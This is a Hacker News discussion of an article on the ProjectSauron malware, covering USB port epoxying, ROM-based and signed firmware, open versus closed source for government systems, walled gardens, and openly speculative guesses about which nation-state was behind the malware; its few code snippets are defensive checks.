Researchers crack open malware that hid for 5 years (arstechnica.com)
357 points by rando444 on Aug 9, 2016 | 221 comments



Interesting regarding USB devices. When US DoD systems were infected with a virus someone brought from home on a USB stick, I remember hearing they were going around filling USB ports with epoxy. There was some method behind the madness, I guess.

There is also a market for routers and other devices which are produced as much as possible in the US (are they rolling their own capacitors, I wonder...). I saw some of those devices come with a 100x markup: $400 device from China vs $40k from the US. Those who sell the $40k version know how hard it is to get on the list, so they are milking it for all it's worth (the sales person was quite frank about it).

It was also funny to see "Windows" as an approved, security-blessed OS and then Debian, Ubuntu, and OpenBSD rejected (with only ancient versions of RHEL approved for Linux).


I wouldn't call RHEL 6 ancient. Thankfully this may be going away at some point in the future, leaving it up to agencies to certify products or stacks on their own merits, or to instead have them be evaluated for specific purposes if sold as solutions: https://www.niap-ccevs.org/Documents_and_Guidance/ccevs/GPOS...


I was still seeing 5 used often, sometimes 4.

And 7, despite being out for 3 years or so, is still not certified.


There's a STIG already for RHEL 7, for what it's worth.


>I remember hearing there were going around filling USB ports with epoxy.

And we all laughed at PS/2 keyboards and mouseeses


You can boot an original IBM PC off the keyboard port. Look for the MFG_BOOT function here:

https://www.iee.et.tu-dresden.de/~kc-club/DOWNLOAD/DISK401/R...

Basically, the device connected to the keyboard port has to reply with code 0x65 when it's initialized, then the BIOS will read some bytes into memory and jump to them. Not sure whether this was carried forward to newer models or clones, though, so it's just some fun trivia...


The original IBM PC switch was like the back switch on current PSUs. If it were on it would be booting anyway, right?


And that's why you can still buy new i7 and Xeon motherboards with PS2 keyboard connectors--because some sites don't want there to be USB ports on the computers.


My computer is locked in a mesh cage anyway. Well, the thin client is.


That's another great idea! Like the cages around thermostats!


Just put the software in the device in ROM, a forgotten technology. No malware will survive a power cycle.

For example, I read that malware could infect your "internet of things" thermostat and then hackers could remotely turn off your heat until you pay a ransom. Just put the dang thermostat code in ROM. Power cycle, goodbye malware.

For more critical stuff, just have it regularly power cycle itself.


If you haven't seen it yet, you may like the stateless laptop idea: http://blog.invisiblethings.org/2015/12/23/state_harmful.htm...


Then you can't do over the wire updates, which means no fixes after it's been manufactured and installed, which would probably increase the costs quite a bit.


> Then you can't do over the wire updates,

Which, of course, is the whole point. If ROMs do cost more, I bet people who want secure systems would be quite willing to pay a bit extra.

It would be too expensive to put an OS in ROM, but the ROMs could contain the hashes of the OS on disk, and can verify the disk image before booting.
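Purely as illustration, a minimal sketch in Python of that hash-check idea, assuming the expected digest is fixed at manufacture time (the digest value and partition path below are placeholders):

    import hashlib

    ROM_HASH = "0" * 64           # placeholder digest burned into ROM
    OS_IMAGE = "/dev/mmcblk0p1"   # placeholder OS partition to verify

    def image_digest(path, block=1 << 20):
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(block), b""):
                h.update(chunk)
        return h.hexdigest()

    if image_digest(OS_IMAGE) != ROM_HASH:
        raise SystemExit("OS image does not match ROM hash; refusing to boot")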

And besides, why would I want over-the-air updates to my freakin' thermostat?


Another way is to have a jumper that is required to enable the write cycle to the flash ROMs. That enables the manufacturer to update the ROMs before shipping, then remove the jumper.

Anyone trying to compromise the device would then require physical access.


Make it a button, so the customer can apply updates, but they need to press a button to make it happen. Add another button which, using only software stored in ROM, reloads the firmware from ROM. Then you have updates, but only when the customer knows and wants it, and if they ever screw it up then they can get back to a known good state.


The customer has no way of knowing whether they are installing a genuine update or a MITM-modified malicious update. Public key cryptography solves that, but then you have the problem of how to protect the keys and crypto algorithms from tampering.

Update buttons ain't a good replacement for TPM hardware.


It's an enormously harder problem to convince the customer to push the "update firmware" button on the front panel than it is to insert malware remotely without any action or knowledge on the customer's part.


It's an enormously easier problem to exploit a well-known remote code execution vulnerability that's unpatched because updates are too easy to ignore.

For the end user, it’s extremely easy to NOT push that button.


It's not a panacea, but nothing is, and it would help a lot. It's not supposed to be a replacement for anything, just an addition.


Yup, that's the way to do it.


This is literally how everything was made until the very recent past. Next you'll be telling me that you can ship software on physical media.


One may consider that an incentive for manufacturers to make sure their code is working correctly before shipping it.

In many cases that would probably be prohibitively expensive, but for a thermostat or a light switch, it should not be that difficult to do.


Prohibitively expensive? That's how things have been done for decades. Only recently have manufacturers decided that everything should be redoable over the internet.


Are you including the capability to control it over a network? Burning potentially unfixable 0-day exploits into ROM would probably be a non-starter.


If you can update the firmware over a network, you have an uncloseable exploit vector.

ROMs are not unfixable. They do require physical access, though, which eliminates nearly all of the risk.


Even if those updates require signature verification with a public key stored in ROM? I guess the signing key could get out, or you could patch the firmware to skip the signature check (the way the initial iPhone was jailbroken).
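For concreteness, a hedged sketch of such a check using the pyca/cryptography Ed25519 API; the key bytes and file names are placeholders, and the jailbreak route above (patching the verifier itself) is exactly what this cannot defend against:

    from cryptography.exceptions import InvalidSignature
    from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PublicKey

    ROM_PUBKEY = bytes(32)   # placeholder 32-byte public key burned into ROM

    def update_is_genuine(image, signature):
        try:
            Ed25519PublicKey.from_public_bytes(ROM_PUBKEY).verify(signature, image)
            return True
        except InvalidSignature:
            return False

    with open("firmware.bin", "rb") as f, open("firmware.sig", "rb") as s:
        if not update_is_genuine(f.read(), s.read()):
            raise SystemExit("bad signature; refusing to flash")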


We also literally just had the Windows key leaks within the last week. Un-updatable signing keys are still an uncloseable exploit vector. (And updatable signing keys are an uncloseable exploit vector. You can't win.)

Physical-access-only updates: yes please. We know what the security boundary is on those, and how to reset it.


A malware infection module can be stored nearby on a different device, reinfecting your target device every time you power it on, until you patch your device.


Right. But each device that uses ROMs is one less attack vulnerability.

After all, if attacks can target A, B, or C, that is no excuse to not fix B.


> No malware will survive a power cycle.

Not true at all.


Please explain.


I'm not the original poster, but unless you're talking about a very simple embedded system, most computing devices have lots of areas for malware to live that will survive power cycles. HDD firmware, graphics card firmware, various controllers have their own firmware, NIC cards have their own firmware, etc.

Even if the boot device is read-only, it would be a huge challenge to build any kind of system without these vulnerable components.


Every one of those devices that is done with ROMs closes another door to malware. It's certainly far more doable and reliable than ensuring the software doesn't have holes in it.

There's a huge market for secure items - routers, cars, thermostats, medical devices, avionics, ATMs, etc. I simply don't understand why ROMs aren't used.


Part of the reason that Windows is an approved OS is enterprise support. When you pay for hundreds of thousands of licenses for a product you can demand features. If the DoD went with Debian they would need an entire corps of developers to maintain government specific patches. Ubuntu offers enterprise support but it's from an African country and that is undesirable as you mentioned above.

I've seen government systems running Windows (USA) and Mac (USA), but the strangest I've seen is SUSE Linux (Germany). I have no idea how they got SUSE approved when Red Hat is more "American", but some agencies don't have to follow the rules.


SUSE is owned by Novell.


Not anymore, IIRC. When Novell was acquired by ... that company whose name I forgot (AttachMate?), SUSE was spun off as an independent company again.

At least that is how I remember it.


Yeah, it seems things have gotten a bit more complicated than I remembered.

Novell bought SUSE, then Novell merged with Attachmate; in the process SUSE became a business unit (wholly owned company?) under Attachmate, then there was a merger between Attachmate and Micro Focus in 2014.

Anyways, I suspect that as SUSE is FOSS, and was initially Germany-based and is now UK-based, both being NATO allies, the DoD has few issues with continued usage.


SAP seems to have a strong preference for SUSE. SAP may have stewarded SUSE through accreditation processes.


It's well known that all of Germany's media, intelligence services, and politics was set up by the US after the war.

From what is seen on the geopolitical landscape, Germany is a vassal state of the US.


Too many people without security clearance can access and modify Linux. In any real security environment, open-source is poison. Period, end of story.


^ As if any amount of security clearance can erase human fallibility.

In any real security environment, humans are poison. Period, end of story. This is not an issue exclusive to open-source.


Of course not, but it's exacerbated by open source. Humans are indeed poison, which is why it's normal to involve as few humans as possible. Unfortunately AI is not sufficiently advanced so you still need some of them in order to get the job done.


This is a falsehood. One of many sources: https://news.ycombinator.com/item?id=7203211 (HN discussion of Snowden using wget to scrape NSA internal sites)


So security through obscurity?


Or maybe security through, you know, actual security.

Closed source does not mean obscurity–– and open source does not mean clarity (see OpenSSL, that one Linux 2.6 thing¹, etc).

It's not like being proprietary suddenly means the only security is through obscurity. Why do you think that? Are you just a zealot? Did you not consider that closed source software could be well-engineered and secure? You're welcome to read about some of the security features in Windows NT² (that article is a bit old but still relevant), which are considerably more thorough than (non-SE)Linux (I think SELinux has auditing now, so it's at least comparable to NT).

Now, don't get me wrong, I generally prefer open-source tools (for a variety of reasons) and tend to trust them more, but saying stupid stuff like you are just gives open source a bad name.

On top of that, obscurity is a perfectly valid layer of security. To use a mediocre analogy, of course you want your safe to be strong enough that nobody could break in even if it's in plain sight—but it's certainly not a bad idea to hide the safe as well.

¹ https://lwn.net/Articles/341773/

² https://www.microsoft.com/resources/documentation/windowsnt/...


I wasn't saying it was only secure due to obscurity. I should have asked more clearly: "So the idea is to enhance security through obscurity?" For mission-critical secure systems, I can see a case being made that software should be closed source, as it allows fewer people to be aware of potential attack vectors, especially if you know the software you are creating won't be used externally much or audited.


So you trust the black boxes someone sold you?


The opposite of “open source” isn't “black box”.


Not the person you're replying to but opposite of open source is closed source, and isn't that basically a black box to you since you don't know what it's doing?

Is there something more subtle I'm missing?


Yes. Microsoft offers source access to Windows. IBM and Oracle will rent you people who know the details of their software. None of those companies' offerings are particularly ‘black box’-y, in spite of being very closed source.

‘Open source’ is more about the development model (and freedoms) than about the nature of ‘knowing what the software is doing’.

Heck, I could argue that Linux is a black box to most people who aren't well-versed in kernel development. OpenSSL is notoriously difficult to understand. Sometimes huge bugs look relatively innocent¹ even with people looking at the code.

¹ e.g. https://lwn.net/Articles/341773/


At the level of security where you need to be paranoid about the operating system developers, how do you know the source code Microsoft shows you, corresponds to the Windows binaries running on your machines? (Let alone to the sum and total of all binary patches applied thereto?)


A source license probably also gets you the build system, or if not maybe you could throw more money at them.

But reproducible builds are a hard problem, so… honestly, I can't answer that.


And that's what I really mean by 'black boxes'. Yes, you can buy access to, e.g., Windows source, but that doesn't mean that what you review and what is running on your systems are the same thing. And I can't even speak to all the third-party bits that get compiled in to an instance of Windows. It's a really, really hard problem.


Well, end of story. That's it then. No more discussion can be had!


>filling USB ports with epoxy

This seems apocryphal. It's trivial to disable USB for mass storage (or all devices) via things like group policy or other security controls. Or disable the controller. Those USB ports aren't perfect boxes; the epoxy would just run out all over the place. More than likely you'd have an OS-level security policy and a BIOS block, which is trivial to do in a managed environment.
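(As a concrete illustration of the group-policy point, and purely my own sketch rather than anything from the story: the usual mass-storage lockdown on Windows is to set the USBSTOR service start type to 4, which a GPO preference or a pushed script can do on every machine.)

    import winreg

    KEY = r"SYSTEM\CurrentControlSet\Services\USBSTOR"

    # Start = 4 (SERVICE_DISABLED): usbstor.sys no longer loads, so newly
    # attached USB mass-storage devices never get mounted. Must run elevated.
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY, 0, winreg.KEY_SET_VALUE) as k:
        winreg.SetValueEx(k, "Start", 0, winreg.REG_DWORD, 4)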

I hear this type of story from time to time and frankly it's the sysadmin version of "he hacked us with a visual basic gui!"

>$400 device from China vs $40k from US.

I'd rather trust my network with a warrantied Cisco with same-day replacement than a $400 Abibaba sourced ROUTER PLUS SHENZEN SPECIAL with two weeks delivery. I suspect you've never managed a non-trivial network before, let alone one with real security policy if you'd consider running that and thinking you're secure.


> This seems apocryphal. Its trivial to disable USB for a mass storage (or all devices) via things like group policy or other security controls. Or disable the controller.

The question is - where do you stop? The controller could be re-enabled from a lower level, etc. The rabbit hole goes very deep. Sometimes it's best to just take control of the physical layer and call it a day.

> Those USB ports aren't perfect boxes, the epoxy would just run out all over the place.

Epoxy putty would work pretty well, and it's widely available.


There's also value in being able to visually inspect it and say "Yep, that USB port's disabled" versus digging through EFI settings.

Every motherboard is going to have that option in a slightly different place, but if you can put epoxy in one USB port you're pretty well set for any piece of hardware.


This scales to ${number_of_devices_you_can_see}. A hundred or more? Easier to manage remotely. You're also likely to have a very limited number of models in that case.


One thing to keep in mind is that the kind of place which cares about things this much tends to be the kind of place which can hire staff — and it's a lot cheaper to hire technicians who can verify that epoxy plug than the security engineers who can confirm that you've done everything right in software.

Consider another instance of the problem: verifying that your webcam isn't being used to spy on you. Since a surprising number of hardware designers were negligent and made that software-controllable, it is orders of magnitude easier to simply deploy a piece of tape than to try to prove that malware hasn't disabled the status LED:

http://security.stackexchange.com/questions/6758/can-webcams...

http://blog.erratasec.com/2013/12/how-to-disable-webcam-ligh...

How much skill and diligence does it take to confirm that you have disabled the controller using each manufacturer's interface (if they even have one documented), that there isn't some way to re-enable it later (or that something like a sleep/resume cycle didn't reset the controller), and that all of that continues to be true for every subsequent configuration change or software/firmware update?

I would suggest that any organization with this level of risk would be better off paying someone $15/hour to check the ports along with the rest of their physical status checks and put the security engineers in charge of other improvements with a higher return.


The thing is, if you manage those things remotely, so can an attacker. I imagine it would not be impossible for a sufficiently skilled and determined attacker to remotely re-enable the USB ports.

If you are paranoid enough or have actual reason to believe somebody would want to invade your network, epoxy is one way you can be really certain no one can hijack your network via an infected USB flash drive.

EDIT: Of course, if gluing the USB ports shut is all you do to stop attackers, you are pretty much begging for trouble. And as somebody pointed out, disconnecting the USB ports from the main board, possibly disabling the pins, is probably a better idea, as well as disabling the USB controller in firmware and locking the BIOS / setup, if it is part of a ... let's say comprehensive approach to securing your network.


> Sometimes it's best to just take control of the physical layer and call it a day.

If you want to stop your every day user from plugging in USB drives then this is probably all you need to do. In a scenario where you're concerned about insider threats with even a minimal level of computing knowledge, you have to lock down the BIOS and the OS layer as well. "Oh the IT guy put epoxy in the USB ports, guess I'll just take the case off and plug into the USB ports on the motherboard"


You can also cut the traces or epoxy the internal ports as well. It's not hard. It's just about what level of threat you want to live with. I imagine you could always defeat this by cutting through the epoxy or gently sanding the board to put probes directly on the traces, but then again security is all about depth.

I have a friend that worked at LLNL and she used to talk about secured laptops having their USB ports epoxied and the traces physically cut on the camera and microphones to help secure them. I think even the wifi and bluetooth were disabled as well.

After hearing these stories, it made me chuckle at Zuckerberg's masking tape.


Well, of course this doesn't give you a get out of jail free card. You still have to pay attention to the other layers in the stack. This is only about paying attention (or not) to the physical layer directly (as opposed to handling physical security indirectly in higher layers).


Case intrusion sensors are a thing. And I swear I have seen cases with loops for padlocks.


Padlocked cases are common on school computers.


Yeah, I should have suspected. Have not set foot back there in ages though. Thinking about it, I guess schools may be some of the most hostile computing environments in civilian life.


> Thinking about it i guess schools may be some of the most hostile computing environments in civilian life.

A long time ago, I briefly managed an environment like that. It was crazy. Kids are really good at breaking stuff in creative ways.


For a hardened PC, the first thing I'd do is burn the BIOS into ROM. Read Only Memory. ROM cannot be infected.


Or to put it another way: "ensuring you've secured all hardware and software exploits in your stack from top to bottom" vs "epoxy and focus on network exploits". Don't knock physical security.


> The controller could be re-enabled from a lower level, etc

In a managed environment you could do it via the BIOS trivially, which is most likely locked as well. I mean, gluing the ports is especially stupid. You can chip glue off with your fingers or a key. If you're doing physical things to the PC, you'd most likely just remove the USB header from the motherboard and call it a day. Pop open the case, remove it, bend down the pins, or cut it, and go about your business. Messing with stuff that takes 60 minutes to cure is ridiculous. Ignoring the OS security policy is ridiculous. Ignoring BIOS controls is ridiculous. Ignoring how security is handled in managed environments is ridiculous.

It would take two minutes for a stoned teenager to pop-open the case and plug in his own USB connector into the header in this scenario. Less time for a determined attacker.

I imagine some middle-manager asshole asked for a piece of plastic to block the panel to make it 'look nice and remind people they're blocked' and some paper-pusher took it as "OMG THEY GLUED THE PORTS TO STOP HACKERS" He was just ignorant of how IT security is really done.

I think it's obvious HN is mostly web devs, not sysadmins or security people, if stuff like this is widely believed and comments contrary to it get instant 'disagree downvotes.' If you think the NSA and the DoD just glue ports instead of doing real security, then I don't know what to say here.


Rather than immediately assuming you know more than the people who implemented this, try to consider why someone who is theoretically smart would want to do this. Also consider that most organizations implement multiple layers of security, adding another layer of security can't hurt here.

> In a managed environment you could do it via the BIOS trivially, which is most likely locked as well.

The BIOS may still not be low-level enough. There is nothing preventing a buggy xhci controller, chipset, BIOS, etc, from being exploited by a rogue USB device. It would be prudent to disable USB in the BIOS AND physically disable the ports somehow.

> Pop open the case, remove it, bend down the pins, or cut it, and go about your business. Messing with stuff that takes 60 minutes to cure is ridiculous.

You do not need epoxy to fully cure, you only need it to reach a point where the viscosity is high enough that enough of it won't drain out of the USB port when you turn the computer on its side. This can easily be under 5 minutes, depending on the type of epoxy and you could even trivially avoid that wait time by putting a piece of tape over the epoxied port. It may also even be cheaper to implement, since you can pay someone minimum wage to fill ports with epoxy, but it takes a slightly higher skill level to do work inside of computer cases. Additionally, it's easier to visually verify that all USB ports are epoxied than it is to verify that all internal USB connectors have been disconnected. Additionally, consider that many motherboards have rear USB ports directly soldered onto the motherboard, which would take far more effort and skill to disconnect than it would to just fill the port with epoxy.

> It would take two minutes for a stoned teenager to pop-open the case and plug in his own USB connector into the header in this scenario. Less time for a determined attacker.

An attacker who has broken into the government building is not the person who this is intended to guard from. It is intended to guard from employees accidentally inserting compromised USB devices into their computers. If the attacker is opening your computer case, they have many more options than USB ports for delivering an exploit payload. Though it's also very likely that these cases are also physically locked and have case intrusion detection enabled. Not that those protections are particularly difficult to get around either. This may also even help IT avoid support phone calls from users saying "hey, how come my USB port doesn't work?" where epoxy in the ports shows some serious intent.

Additionally, in the case of a real attacker who has physically entered the building, and intends to deliver their payload by flash drive: formerly they could just waltz by some computer, pop a drive in, and walk away. Now they'd need to at the very least open the case, which at the very least makes it take slightly longer for them to deliver their payload, and is much more likely to draw suspicion.


Yeah, the curing time can vary from 1 minute (or even less) to several hours, depending on epoxy type. Now mix it with some filler to make putty (or just buy epoxy putty ready to use) and even the curing time is no longer critical.

Anyway, you know the discussion has gone down the rathole when you're debating the relative merits of epoxy recipes for securing computers. :)


> This seems apocryphal.

I have no reason to believe the person I worked with would make it up. There would just be no point in it.

> Its trivial to disable USB for a mass storage (or all devices)

Except there are hundreds of different kinds of devices, and you are tasked with quickly "doing something to fix the problem". Do you have time to go and dig through different types of BIOS menus or open the cases of all the machines? Or is it easier to get epoxy plungers and send an army of people from desk to desk? Normal epoxy is a pretty decent electrical insulator (some boards or components used to even be dipped in epoxy to protect against environmental damage or tampering).

> I suspect you've never managed a non-trivial network before,

No, but I was selling a solution with one in it. And $40k was making a decent size cut in the profit margin.


Why not just unplug the USB header if you want a physical solution? The idea that you're shoving glue in there is incredibly ridiculous. You can chip that off easily with your finger or a key. I seriously doubt this is a real story because it flies in the face of published STIGs and basic common sense. Nor would it stop a remotely determined attacker/idiot.

That said, I could see gluing on a panel to block them as a visual reminder to people that those ports are off, but not as a primary blocking device. More than likely it's done via security policy.


They epoxied the USB ports on my secure machine when I worked at one of the national labs about 12 years ago. One day I came in and the admin had gone through everyone's office the evening before with a bunch of JB weld to fill the USB ports.

So, whether or not you believe that it is a useful solution, it certainly did happen. As for alternatives to gluing, I assume that was time related: filling in a port is certainly faster than opening thousands of machines to give them a physical port-ectomy.


Port-ectomy: a new word in my dictionary, must remember to use it someday!


> You can chip that off easily with your finger or a key.

Because it was more of a reminder against stupidity. "Oh, look, there is glue in there; that's right, we're not supposed to stick random USB devices in there." If the machine is on their desk, yes, they could plug in a PCI device that has a USB port on it and still connect. But by that point they are really going out of their way, they are opening the case and such, and it will be very hard to maintain the idea that it was just a stupid mistake.


Exactly. The other related threat is the new junior admin being asked by a senior exec to allow (Windows policy-wise) USB storage just temporarily: "Because I need this presentation NOW as I have to get to the airport in 45 minutes!"


Rear USB ports are not attached to the motherboard via trivially removable connectors.

It also really is not trivial to chip off most types of even general-purpose epoxy with your finger on a flat surface, let alone a tiny USB port which your finger doesn't fit in. If the epoxy was selected with some level of care, it may be very, very time consuming, or nearly impossible to remove, even with the right tools.

No matter what, it's a helpful measure in addition to every other way you can also disable a USB port.


Well, the thing is, I don't know if you know it, but Foxconn builds your Ciscos. I only know because I worked installing fiber in the plant they have in Houston; it's one of a number in the US. In there I saw lots of Chinese ladies putting together made-to-order Cisco switches of all sizes, with boards I assume were made in China. Oh, don't get me wrong, the Americans worked in sales out front. :)


What is the role of an InfoSec professional in an environment where advanced threats like this are being deployed? I mean, a beat cop knows when it's time to call the FBI or the military. But the open nature of the Net means that firewall probes by script kiddies are interspersed with intrusions by nation-state actors. It's a weird state of affairs.


Work with stakeholders to minimize lateral movement after a breach, get monitoring in place to detect breaches, and have a response plan.

If you have company critical secrets or life-safety systems, you need to air gap where possible.

That's your job. You cannot stop or prevent attacks, and if you don't have the metrics and logs, the FBI won't be able to do anything, assuming you can get them to give a shit.


I'm sure the nation-state actors couldn't be happier about the confusing nature of that, and cultivate it within reason.


> The researchers went on to speculate that the project was funded by a nation-state, but they stopped short of saying which one.

So ... does anyone, perhaps who doesn't have Kaspersky's business interests to protect, care to actually speculate? In other cases it's been seemingly well-known in the security community which APT attacks trace back to which countries, it's just apparently impolite to say it in public.


Russia, Iran, Rwanda... Let's assume the latter is a vector, not the target. (The attacker is sophisticated enough that we can assume Rwanda itself is of little interest). Rwanda also has fairly close ties to Russia, which strengthens the vector hypothesis.

Russia+Iran suggests a western actor. Their biggest shared interest is Syria, I'd think. And look, the Syrian conflict is on since March '11, and the activity according to Kaspersky reaches back to June '11. I'd say that's quite close.

Neither the US nor Europe were that deeply invested in Syria. There is, however, one small Middle Eastern country that has quite an interest in the entire region, and also isn't friends with Iran or Russia. And it just so happens that Israel has a fairly close affiliation with Rwanda.

None of that is in any way conclusive, but it certainly is probable.


> and also isn't friends with Iran or Russia

Actually Israel is on very friendly terms with Russia. There are a ton of Russian immigrants in Israel to the point that Putin called them "Russian ambassadors".

It didn't start that way - part of the history of the creation of the modern state of Israel is Russia vs US proxy conflict (of sorts) via Egypt. But it's not like that anymore, not for a long time.

(The US and Russia have moved on to other proxies :)


While I'm not a proponent of the idea that Israel is behind this malware, I disagree with you. Israel is not on particularly good terms with Russia. Yes, the two governments have established a hotline to ensure that Russian military maneuvers in Syria are not misinterpreted, but the two countries are closer to foes with a mutually accepted cold peace. It's in the strategic interests of each country not to be outwardly hostile to one another, but they're definitely adversaries in many respects.


The list of countries with a known infection suggests a Western nation acting alone, or in cooperation with others (for instance, the "Five Eyes").

Alternatively, one of the infected nations could also be responsible. Infecting selected systems inside your own border could be a way to deflect attention when the hunt for the malware's authors began.

Pure speculation on my part, and nothing particularly new.


Remember, you got the list from a company led by ex-KGB, with very close FSB (and Putin) ties. Kaspersky himself studied in a KGB-sponsored school. He even met his wife at a KGB holiday resort.

Not suggesting anything, just keep that in mind.


Kaspersky has significant ties to the Russian government, so presumably some nation-state who Russia opposes.

This likely means the USA, a US ally like Israel, or a growing power such as China or India.

But the USA is the most likely candidate.


Apple's walled garden has been subjected to criticism from open source advocates. And Windows 10's telemetry triggers a lot of privacy concerns, too.

But in our current security environment, what if these walls become necessary for secure computing? By analogy, there's a reason that many ancient cities were circled by a wall.


> By analogy, there's a reason that many ancient cities were circled by a wall.

Walls around cities were likely very poor at stopping small, stealthy groups of infiltrators. They were designed for much more brute force attacks. Apple's walled garden helps quite a bit with the deluge of crap that would be available without it. Without it there would be an order of magnitude more crap (in quantity and quality). That said, there's a vibrant black market for people that can't stand the oppressive policies of Apple.

Additionally, once you have a wall in place, it's easy to make a decision to tax certain types of traffic through it because the capability is now there, whether or not it's in the best economic interest of the people inside. Apple didn't skimp on this area. The wall was erected with tithes and taxation in mind, and collection booths at all the gates.

So, does it help? Well, it prevents roving bands of bandits from riding in, terrorizing and robbing the people unlucky enough to be in their path, and making a hasty exit, so yes, but if you're a tasty enough target, getting past the wall isn't really a problem. There are myriad ways to do that as long as you're careful. For example, the numerous secret tunnels through the wall. They aren't large, and they are constantly being filled in by the city engineers, but there's always some they haven't found if you are willing to ask the right people (or dig your own).

Okay, I believe I've tortured this analogy enough...


I'm not sure that is a good analogy for the wall. Is it a different wall protecting thousands of cities or one of maybe ~10 walls (the main OS's) that is reused? Would it be that hard to build a few good walls? As you said though, there are always alternative ways to be attacked - robbed on the highway (man in the middle?) etc.


Devil's advocate, walls and the enablement of taxation also centralized capital and enabled cities to spend it on public works that might not have been built otherwise (and before I get the "then they shouldn't!" retort, I think we can all agree there are shared infrastructure resources that w/couldn't be built by private actors).

In a world where all phones are loosely controlled Android derivatives competing on slim profit margins, is anyone going to make the drive for hard, hardware-enabled crypto? And even if they wanted to, could they afford it?


> Devil's advocate, walls and the enablement of taxation

Sure. I wasn't making a case that taxation at the wall is bad, but that it has the capability to be bad. We use regulation in (mostly) free markets to greater or lesser success to steer the markets in some manner. If you accept that pure capitalism doesn't necessarily yield an optimally performing system when people are involved, then that ability to influence the market is a useful capability, especially when applied judiciously. A blanket rate isn't necessarily the most efficient form of that, but it is a way to raise revenue.

> In a world where all phones are loosely controlled Android derivates

I think you've already stacked the starting conditions to the point where it's not really worthwhile to consider. That situation would be ripe for disruption in some manner, because I think it's inherently unstable. All it takes is a small niche market for alternatives that do make choices based on privacy or security, and events that spur interest in those topics, and the larger population of providers will need to respond appropriately or risk ceding an increasingly large portion of the market to those that do.


I think the outcome of the first generation of smartphone OS's has (surprisingly for me at least) shown that there's really only room for a handful of players (Android/AChina, iOS) with sufficient numbers of users to be self-sustaining.

As you note, not sure a unipolar outcome would ever be stable enough to have persisted, but I wouldn't have expected a bipolar arrangement either. And I can imagine a market structure that would have depressed manufacturer profits far enough so as to preclude serious R&D / innovation on their parts.


You know, it's common enough to have one dominant player in a market, a small few chasing players, and then a bunch of very niche players that I'm sure there's a lot of economic theory behind it that I'm unaware of. It probably relies quite a bit on how invested in the product you are once you've decided on it, but there are plenty of examples throughout history[1].

1: http://images.dailytech.com/nimage/Smartphone_Market_Share_2...


Let's keep this in mind the next time we get the idea to let market forces regulate, say, school systems or infrastructure.


The problem with Windows is that it is just a wall made of glass


I suspect your comment will be met harshly here, but I agree for at least a subset of users. If you regularly read HN, you probably can see the clear downsides of the so-called 'walled garden' approach. I can too. Then I have a 10-minute conversation trying to help my mother-in-law with whatever Best-buy recommended cheap PC she purchased 2 years ago, and I am convinced that she needs the walled garden.


"There was a pop-up which said that there was a virus and I needed to click OK to get it removed."

I swear to God I'd put adblock on that laptop to reduce this risk. Not to mention there must have been multiple click-throughs for the different hurdles to install the malware. This is not a problem I envisage happening on Mum's iPad though, and there's a lot to be said for that peace of mind.


I'm definitely an advocate of open source myself, and I never thought I'd be considering the other side's arguments. It's just that I see major data/security breaches increasing in the news, along with stories (like this one) about cyber-offensive capabilities growing more and more powerful. In the InfoSec world, it seems like anything is hackable, and the balance of power firmly lies with offensive tools. I'm just scratching my head about what the appropriate defensive strategies are going to be, given that Chinese and Russian state-sponsored hackers are known to attack civilian targets. I'm not sure how we're supposed to secure our government, financial, and tech companies against these players.

For all of their known (and probable) capabilities, our three-letter agencies don't seem too concerned about encouraging defensive technologies and securing domestic networks.


What do you mean "attack"? Is there some specific harm being done that you want to protect against? Breach of defenses isn't itself an attack. A foreign agent inside your castle isn't an attacker until they start stabbing people, right?

I'm not personally worried about what Chinese and Russian hackers know about me, because none of that information is particularly useful for taking valuables from me. I am curious what your experience is, just so I can understand the context of your concern.


I'm concerned about industrial espionage: http://www.cnbc.com/2015/10/19/china-hacking-us-companies-fo...

Also at personal risk is anyone with a US security clearance: https://www.washingtonpost.com/news/federal-eye/wp/2015/07/0...


How do you assume that the information isn't useful? That implies that all your valuables are fully isolated from the digital world - really? I really have trouble understanding the "I have nothing to hide" attitude. How is that different from saying "there is this guy always standing in the corner of my living room, but I'll just assume he's benign..."?


Well I would notice if something valuable to me is taken.


I know exactly what you are talking about. I'm just really afraid of what the knock-on effects are going to be of starting kids out in walled gardens. I wouldn't be an engineer today if it wasn't for the fact that it was possible for me to play with various languages, or start distro hopping in high school with a 433Mhz PC. These walled gardens make it easy to keep everything working, but come at a high cost of actually learning what the device does.


But what if the wall has holes in it and you don't even know about it? What if the "bad guys" uncover the holes before you? Or what if you do know but you still can do nothing about them? What if the "bad guys" are the ones who built the wall, not to secure you but to contain you?


The walled garden doesn't mean it lacks hidden doors (intentional or via hacks) for bad actors. It just means you, the user, have less control of your machine than the OS does. It's as likely to wall you in with malware you can't remove, as to wall it out.


How about a FLOSS archive that provides peer-reviewed and signed applications from a trusted source only? Automated security updates? A security team that can provide fixes independently from the upstream authors?

...because I just described how Debian worked for the last 20 years.


I'm curious: How realistic is building malware like this? Is this something that has been done out in the open by researchers? Is there an example we can see, or is this all still rumors?

The reason I ask is because there's actually value in spreading the rumor that a capability like this exists. Imagine if your adversary believed that you could gain access to their computers even when they're not connected to the internet. They'd run themselves in circles trying to secure everything!

In general, I believe this article to be true, but would love to learn more of the details.


From Kaspersky Lab's analysis:

>What would ProjectSauron have cost to set up and run?

>Kaspersky Lab has no exact data on this, but estimates that the development and operation of ProjectSauron is likely to have required several specialist teams and a budget probably running into millions of dollars.

https://securelist.com/analysis/publications/75533/faq-the-p...


It would take an inordinate amount of time for a person to build something like ProjectSauron, but after reading the link, it uses a wide range of publicly-known techniques (windows key loggers, password filters, DNS/ICMP exfil, named pipes, etc etc). This software seems to do a good job at amalgamating a wide range of methods.


Read this as an "introduction" and then you'll be able to understand why the researchers can be so sure that this specific kind of malware must be state-sponsored:

http://www.nytimes.com/2012/06/01/world/middleeast/obama-ord...

http://www.langner.com/en/wp-content/uploads/2013/11/To-kill...

Simply put, the goals and methods of commercial malware are fundamentally different from those that can be recognized in state-sponsored malware.


This is realistic; there are examples you can see.

Have a google around for Stuxnet; a fairly advanced piece of malware which went after Iranian nuclear enrichment centrifuges. It used five previously unreported Microsoft vulnerabilities and a bunch of fairly advanced techniques including jumping airgaps like ProjectSauron does via USB.

There are samples of Stuxnet kicking about, if you want to take a look yourself there's nothing stopping you. Although, you may be there a while.


It is real, and many similar samples exist. People in the industry can usually ask around and get copies.


That is a really impressive piece of software. USB exfiltration of data on air gapped machines is next level. I'm in awe of their skill.


If your machine has a USB port, it's no longer properly isolated.

